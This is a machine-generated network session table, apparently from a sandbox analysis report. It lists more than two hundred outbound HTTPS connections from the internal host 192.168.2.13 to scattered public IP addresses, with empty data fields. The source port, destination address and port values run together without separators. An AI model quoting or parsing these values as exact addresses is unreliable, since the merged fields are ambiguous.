                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14342192.168.2.1360584176.18.114.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14343192.168.2.133810494.78.109.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14344192.168.2.1356368212.169.18.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14345192.168.2.1356710116.66.83.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14346192.168.2.1340758205.101.135.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14347192.168.2.135627852.92.86.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14348192.168.2.1338176199.63.152.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14349192.168.2.13571505.129.126.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14350192.168.2.134293887.103.62.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14351192.168.2.1344552155.231.168.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14352192.168.2.134129280.237.144.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14353192.168.2.1333722107.141.223.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14354192.168.2.133398280.172.119.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14355192.168.2.13432564.92.106.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14356192.168.2.134200067.43.100.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14357192.168.2.135818458.150.110.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14358192.168.2.134304259.246.63.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14359192.168.2.1356914188.160.152.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14360192.168.2.1338042111.0.38.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14361192.168.2.1357826186.24.202.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14362192.168.2.1333840135.183.205.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14363192.168.2.1333048184.92.50.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14364192.168.2.1359948195.144.73.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14365192.168.2.1347464146.158.211.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14366192.168.2.1344388128.219.207.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14367192.168.2.134909413.164.165.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14368192.168.2.135723242.18.214.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14369192.168.2.1350648105.240.78.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14370192.168.2.1334110114.102.126.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14371192.168.2.1357292114.170.136.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14372192.168.2.134024241.228.193.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14373192.168.2.1337900120.249.164.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14374192.168.2.1349474107.68.164.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14375192.168.2.1358314135.157.95.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14376192.168.2.134630669.126.166.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14377192.168.2.1345226142.29.121.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14378192.168.2.134580446.45.160.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14379192.168.2.134627059.187.94.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14380192.168.2.1347522150.195.28.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14381192.168.2.1356822219.23.133.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14382192.168.2.1358388129.215.201.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14383192.168.2.1348834128.244.98.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14384192.168.2.1357728200.10.48.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14385192.168.2.135803484.2.49.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14386192.168.2.135941472.221.237.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14387192.168.2.1360354202.51.177.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14388192.168.2.133712425.163.178.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14389192.168.2.1349526175.55.73.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14390192.168.2.1336384109.174.43.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14391192.168.2.133921224.164.49.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14392192.168.2.133393644.24.75.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14393192.168.2.13428909.112.160.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14394192.168.2.1344026131.17.88.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14395192.168.2.1338172200.170.220.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14396192.168.2.1347338200.8.41.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14397192.168.2.133991498.247.124.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14398192.168.2.1336714131.177.195.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14399192.168.2.134755296.56.107.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14400192.168.2.1347424217.129.251.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14401192.168.2.134147490.123.8.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14402192.168.2.133428495.176.166.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14403192.168.2.13581062.55.67.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14404192.168.2.1340686172.75.140.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14405192.168.2.133561861.103.18.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14406192.168.2.134823058.131.175.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14407192.168.2.134133836.71.144.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14408192.168.2.1352076153.197.151.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14409192.168.2.1335574113.63.216.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14410192.168.2.1345852116.170.138.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14411192.168.2.1358222145.178.79.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14412192.168.2.1334150199.191.163.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14413192.168.2.1342114211.245.220.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14414192.168.2.136051817.200.183.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14415192.168.2.1348758199.206.60.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14416192.168.2.1335298148.52.80.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14417192.168.2.135641025.164.56.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14418192.168.2.1336580193.51.99.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14419192.168.2.1346446155.164.132.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14420192.168.2.1351164202.151.189.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14421192.168.2.1339688120.109.139.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14422192.168.2.1345806136.150.0.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14423192.168.2.1352940202.155.220.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14424192.168.2.1342696167.253.75.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14425192.168.2.1356938166.221.190.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14426192.168.2.1360484116.9.204.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14427192.168.2.134760250.5.183.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14428192.168.2.1338178177.142.156.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14429192.168.2.133571832.46.160.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14430192.168.2.135204277.58.97.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14431192.168.2.1335060162.146.52.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14432192.168.2.1356202207.104.253.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14433192.168.2.1347648175.105.145.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14434192.168.2.1338018222.150.204.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14435192.168.2.135798088.181.229.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14436192.168.2.134419463.71.63.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14437192.168.2.1345428187.196.109.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14438192.168.2.133329035.228.105.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14439192.168.2.1343544184.214.148.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14440192.168.2.1341258138.177.105.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14441192.168.2.134356024.49.59.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14442192.168.2.133630032.121.26.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14443192.168.2.1341338102.185.219.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14444192.168.2.1354758114.158.202.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14445192.168.2.133294863.90.223.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14446192.168.2.1351312130.12.159.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14447192.168.2.133762231.18.53.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14448192.168.2.1340974139.133.104.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14449192.168.2.135403253.87.32.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14450192.168.2.13559205.90.254.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14451192.168.2.134831063.17.65.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14452192.168.2.1347964110.193.9.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14453192.168.2.133879886.49.38.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14454192.168.2.134595237.241.100.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14455192.168.2.133304287.24.212.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14456192.168.2.133939214.8.119.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14457192.168.2.1342966115.109.212.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14458192.168.2.135520820.227.166.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14459192.168.2.1349120205.84.253.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14460192.168.2.1358274166.214.180.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14461192.168.2.1353398153.108.26.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14462192.168.2.1347000157.161.135.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14463192.168.2.1357050168.92.183.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14464192.168.2.1333344143.35.70.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14465192.168.2.135624090.154.242.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14466192.168.2.1344408157.43.90.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14467192.168.2.1339290120.55.114.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14468192.168.2.1340688212.109.169.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14469192.168.2.135678812.100.51.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14470192.168.2.1345144109.205.143.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14471192.168.2.1351218207.45.88.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14472192.168.2.1340306113.73.188.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14473192.168.2.134114424.52.97.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14474192.168.2.1337416178.223.241.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14475192.168.2.1342514174.44.69.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14476192.168.2.1353198212.75.35.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14477192.168.2.1360354210.72.187.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14478192.168.2.134509025.27.18.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14479192.168.2.1353380159.37.211.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14480192.168.2.1349944207.175.40.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14481192.168.2.134597494.70.83.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14482192.168.2.134583081.243.18.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14483192.168.2.1355034199.183.177.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14484192.168.2.1347050139.172.175.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14485192.168.2.134808051.176.121.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14486192.168.2.135734075.11.174.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14487192.168.2.133468866.118.238.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14488192.168.2.1357470122.66.73.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14489192.168.2.134809818.202.41.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14490192.168.2.133485052.9.13.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14491192.168.2.1352926202.87.141.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14492192.168.2.1359508160.202.33.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14493192.168.2.1334086169.167.26.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14494192.168.2.1340366207.28.246.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14495192.168.2.1350730160.151.153.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14496192.168.2.135948494.141.170.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14497192.168.2.135391849.193.76.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14498192.168.2.135017839.238.112.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14499192.168.2.1350432114.128.57.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14500192.168.2.1359836119.45.146.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14501192.168.2.1346634203.133.90.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14502192.168.2.134270096.37.72.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14503192.168.2.1348698164.125.77.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14504192.168.2.1347006177.74.95.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14505192.168.2.135372882.235.188.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14506192.168.2.1350384104.70.71.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14507192.168.2.1351110160.146.61.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14508192.168.2.1333528205.245.201.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14509192.168.2.1356556180.140.250.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14510192.168.2.1344828110.111.29.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14511192.168.2.1348368220.5.150.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14512192.168.2.1353118107.212.8.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14513192.168.2.1351912125.168.167.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14514192.168.2.133695699.133.213.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14515192.168.2.1337024186.126.76.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14516192.168.2.1332838202.6.42.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14517192.168.2.135916045.108.233.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14518192.168.2.134925043.167.46.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14519192.168.2.134366023.198.1.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14520192.168.2.133786269.171.27.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14521192.168.2.134120472.232.220.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14522192.168.2.1341726145.183.186.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14523192.168.2.1359826111.153.144.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14524192.168.2.1334530220.2.194.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14525192.168.2.1335520137.6.33.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14526192.168.2.135196641.10.22.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14527192.168.2.134600881.253.167.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14528192.168.2.133915863.182.251.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14529192.168.2.1335750100.29.172.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14530192.168.2.135842880.17.176.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14531192.168.2.1347572102.182.26.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14532192.168.2.134223477.41.247.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14533192.168.2.1357272200.74.177.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14534192.168.2.1356892120.145.50.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14535192.168.2.135164043.51.243.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14536192.168.2.1336196200.64.84.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14537192.168.2.1343500189.227.251.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14538192.168.2.1360656194.124.149.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14539192.168.2.1341542217.192.167.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14540192.168.2.1347552144.52.194.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14541192.168.2.134961679.72.55.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14542192.168.2.133748427.113.200.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14543192.168.2.1342396177.214.48.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14544192.168.2.134006699.72.238.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14545192.168.2.134775836.119.13.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14546192.168.2.135413471.1.124.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14547192.168.2.1351628201.12.212.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14548192.168.2.1333196134.196.216.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14549192.168.2.1355224129.116.171.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14550192.168.2.1347622203.24.64.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14551192.168.2.1359752133.255.163.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14552192.168.2.1343324201.175.185.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14553192.168.2.1339082101.232.181.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14554192.168.2.1351032104.156.123.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14555192.168.2.135982436.151.78.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14556192.168.2.1351638211.169.96.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14557192.168.2.1357102178.92.0.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14558192.168.2.1342762198.99.189.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14559192.168.2.1338904135.62.107.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14560192.168.2.1348534213.134.236.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14561192.168.2.1347798202.84.140.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14562192.168.2.1357694201.9.10.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14563192.168.2.1335084101.186.141.16443
